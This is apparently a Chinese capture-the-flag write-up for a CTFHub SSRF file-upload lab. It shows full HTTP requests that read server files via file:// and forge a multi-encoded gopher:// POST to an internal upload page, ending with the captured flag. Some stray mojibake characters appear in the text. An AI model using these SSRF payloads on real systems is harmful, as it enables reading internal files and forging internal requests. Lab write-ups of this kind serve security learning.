提示

這次需要上傳一個文件到flag.php了.我準備了個302.php可能會有用.祝你好運

題解

根據(jù)提示依次訪問下flag.php和302.php

http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php

http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/302.php

發(fā)現(xiàn)flag.php處是一個文件上傳界面，但是缺少提交按鈕，

修改前端頁面，添加提交按鈕：

1.png

2.png
先看一下flag.php的源碼

利用file協(xié)議讀取flag.php的源碼：

請求包：
GET /?url=file:///var/www/html/flag.php HTTP/1.1
Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


響應包：
HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Sat, 31 Oct 2020 07:10:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 356
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *

<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

Upload Webshell

<form action="/flag.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
</form>

發(fā)現(xiàn)會判斷文件是否為空阴幌。

隨便上傳一個非空文件，抓包：
（haha.txt：哈哈哈哈）

POST /flag.php HTTP/1.1
Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
Content-Type: multipart/form-data; boundary=---------------------------173052974622637
Content-Length: 311
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------173052974622637
Content-Disposition: form-data; name="file"; filename="haha.txt"
Content-Type: text/plain

????????????
-----------------------------173052974622637
Content-Disposition: form-data; name="submit"

????o¤??￥èˉ￠
-----------------------------173052974622637--

將上面的包進行第一次url編碼吭练，然后把%0A改成%0D%0A：

POST%20/flag.php%20HTTP/1.1%0D%0AHost%3A%20challenge-5a05d44ccb194622.sandbox.ctfhub.com%3A10080%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20WOW64%3B%20rv%3A68.0%29%20Gecko/20100101%20Firefox/68.0%0D%0AAccept%3A%20text/html%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0D%0AReferer%3A%20http%3A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%3A10080/%3Furl%3D127.0.0.1/flag.php%0D%0AContent-Type%3A%20multipart/form-data%3B%20boundary%3D---------------------------173052974622637%0D%0AContent-Length%3A%20311%0D%0AConnection%3A%20close%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0A%0D%0A-----------------------------173052974622637%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%22haha.txt%22%0D%0AContent-Type%3A%20text/plain%0D%0A%0D%0A%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%0D%0A-----------------------------173052974622637%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22submit%22%0D%0A%0D%0A%C3%A6%C2%8F%C2%90%C3%A4%C2%BA%C2%A4%C3%A6%C2%9F%C2%A5%C3%A8%C2%AF%C2%A2%0D%0A-----------------------------173052974622637--

然后再進行兩次url編碼:

POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080%25250D%25250AUser-Agent%25253A%252520Mozilla/5.0%252520%252528Windows%252520NT%25252010.0%25253B%252520WOW64%25253B%252520rv%25253A68.0%252529%252520Gecko/20100101%252520Firefox/68.0%25250D%25250AAccept%25253A%252520text/html%25252Capplication/xhtml%25252Bxml%25252Capplication/xml%25253Bq%25253D0.9%25252C%25252A/%25252A%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AReferer%25253A%252520http%25253A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080/%25253Furl%25253D127.0.0.1/flag.php%25250D%25250AContent-Type%25253A%252520multipart/form-data%25253B%252520boundary%25253D---------------------------173052974622637%25250D%25250AContent-Length%25253A%252520311%25250D%25250AConnection%25253A%252520close%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522haha.txt%252522%25250D%25250AContent-Type%25253A%252520text/plain%25250D%25250A%25250D%25250A%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525C3%2525A6%2525C2%25258F%2525C2%252590%2525C3%2525A4%2525C2%2525BA%2525C2%2525A4%2525C3%2525A6%2525C2%25259F%2525C2%2525A5%2525C3%2525A8%2525C2%2525AF%2525C2%2525A2%25250D%25250A-----------------------------173052974622637--

拼接payload發(fā)送GET請求：

GET /?url=127.0.0.1/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080%25250D%25250AUser-Agent%25253A%252520Mozilla/5.0%252520%252528Windows%252520NT%25252010.0%25253B%252520WOW64%25253B%252520rv%25253A68.0%252529%252520Gecko/20100101%252520Firefox/68.0%25250D%25250AAccept%25253A%252520text/html%25252Capplication/xhtml%25252Bxml%25252Capplication/xml%25253Bq%25253D0.9%25252C%25252A/%25252A%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AReferer%25253A%252520http%25253A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080/%25253Furl%25253D127.0.0.1/flag.php%25250D%25250AContent-Type%25253A%252520multipart/form-data%25253B%252520boundary%25253D---------------------------173052974622637%25250D%25250AContent-Length%25253A%252520311%25250D%25250AConnection%25253A%252520close%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522haha.txt%252522%25250D%25250AContent-Type%25253A%252520text/plain%25250D%25250A%25250D%25250A%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525C3%2525A6%2525C2%25258F%2525C2%252590%2525C3%2525A4%2525C2%2525BA%2525C2%2525A4%2525C3%2525A6%2525C2%25259F%2525C2%2525A5%2525C3%2525A8%2525C2%2525AF%2525C2%2525A2%25250D%25250A-----------------------------173052974622637-- HTTP/1.1
Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

得到flag：

HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Sat, 31 Oct 2020 07:32:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 241
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *

HTTP/1.1 200 OK
Date: Sat, 31 Oct 2020 07:32:30 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/5.6.40
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8

ctfhub{562a1f1288bed76e4fb1b639c74d1cd24653d7b1}

CTFHub-SSRF-文件上傳

CTFHub-SSRF-文件上傳

提示

題解